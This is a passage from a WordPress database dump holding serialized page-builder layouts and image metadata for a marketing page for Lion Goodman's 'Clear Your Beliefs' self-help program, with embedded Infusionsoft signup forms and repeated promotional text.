size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1204, 1682, '_wp_attached_file', '2014/10/IClearIt-website_sml.jpg'),
(1205, 1682, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1349;s:6:"height";i:697;s:4:"file";s:32:"2014/10/IClearIt-website_sml.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"IClearIt-website_sml-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"IClearIt-website_sml-300x155.jpg";s:5:"width";i:300;s:6:"height";i:155;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"IClearIt-website_sml-1024x529.jpg";s:5:"width";i:1024;s:6:"height";i:529;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:32:"IClearIt-website_sml-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:32:"IClearIt-website_sml-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:32:"IClearIt-website_sml-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:32:"IClearIt-website_sml-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:33:"IClearIt-website_sml-1038x576.jpg";s:5:"width";i:1038;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1206, 1683, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:18px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-150x150.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1207, 1684, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -17px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:22px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-150x150.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1208, 1685, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" 